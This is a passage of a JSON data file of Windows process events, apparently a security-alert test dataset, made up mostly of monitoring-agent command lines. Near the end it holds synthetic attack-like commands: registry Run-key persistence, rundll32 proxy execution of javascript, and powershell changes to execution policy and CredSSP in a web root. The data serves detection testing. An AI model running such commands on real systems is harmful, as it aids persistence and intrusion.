CAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\"1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\"reg.exe\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo 